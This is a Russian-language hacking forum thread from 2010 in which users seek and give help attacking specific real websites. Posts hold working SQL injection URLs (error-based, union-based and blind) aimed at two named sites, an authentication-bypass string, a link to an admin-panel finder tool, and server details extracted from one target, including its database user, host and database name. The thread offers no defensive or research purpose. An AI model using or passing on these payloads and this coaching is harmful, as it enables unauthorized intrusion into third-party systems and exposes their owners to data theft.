HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.04.2010, 19:15
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
С нами: 8556372

Репутация: 127
По умолчанию

Блин, подскажите директории где обычно бывают админки или как её вообще найти. Robots.txt нету, структуру сайта сканил - ничего, визуально тоже нет такого, самые простые URLы подставлял (/admin,/admin.php и т.д.) - ничего.

Заранее спасибо
 
Ответить с цитированием

  #2  
Старый 01.04.2010, 19:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от b82a  
Блин, подскажите директории где обычно бывают админки или как её вообще найти. Robots.txt нету, структуру сайта сканил - ничего, визуально тоже нет такого, самые простые URLы подставлял (/admin,/admin.php и т.д.) - ничего.

Заранее спасибо
http://rapidshare.com/files/273513716/adminfinder.rar.html
 
Ответить с цитированием

  #3  
Старый 01.04.2010, 19:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

link was dead!

try this one

http://uploading.com/files/KCDVDDST/adminfinder.rar.html
 
Ответить с цитированием

  #4  
Старый 01.04.2010, 20:14
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
С нами: 8556372

Репутация: 127
По умолчанию

Цитата:
Сообщение от Konqi  
link was dead!

try this one

http://uploading.com/files/KCDVDDST/adminfinder.rar.html
Yes, thanks, good program, but dont help me with my site...
 
Ответить с цитированием

  #5  
Старый 01.04.2010, 21:36
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами: 8803961

Репутация: 8
По умолчанию

Помогите определить версию БД

http://www.opderschmelz.lu/index.php?id=10;event=(select+1+from+(select+count (0),concat((select+version()),floor(rand(0)*2))+fr om+(select+1+union+select+2+union+select+3)x+group +by+2+limit+1)a)


http://www.opderschmelz.lu/admin/

набираю 'or+5=5/*

не проходит
 
Ответить с цитированием

  #6  
Старый 01.04.2010, 22:17
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами: 9000386

Репутация: 1148
По умолчанию

Цитата:
Сообщение от FlaktW  
Помогите определить версию БД
Код:
_http://www.opderschmelz.lu/index.php?id=10;event=415+and+5=@@version
5 ветка!
 
Ответить с цитированием

  #7  
Старый 02.04.2010, 00:53
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
http://www.opderschmelz.lu/index.php?id=10;event=415+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,version(),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+limit+1,1/*

5.0.32-Debian_7etch10-log
 
Ответить с цитированием

  #8  
Старый 02.04.2010, 08:15
G1G
Banned
Регистрация: 04.06.2009
Сообщений: 58
С нами: 8913322

Репутация: 23
По умолчанию

Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:

http://www.lavozindependiente.com/news.php?nid=517'

Что то сам пытался..

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue
 
Ответить с цитированием

  #9  
Старый 02.04.2010, 15:36
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от G1G  
Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:

http://www.lavozindependiente.com/news.php?nid=517'

Что то сам пытался..

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue
Код:
http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
дальше сложнее, т.к. и union и select фильтруются неподецки
 
Ответить с цитированием

  #10  
Старый 02.04.2010, 16:58
G1G
Banned
Регистрация: 04.06.2009
Сообщений: 58
С нами: 8913322

Репутация: 23
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
дальше сложнее, т.к. и union и select фильтруются неподецки
От души бро !
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.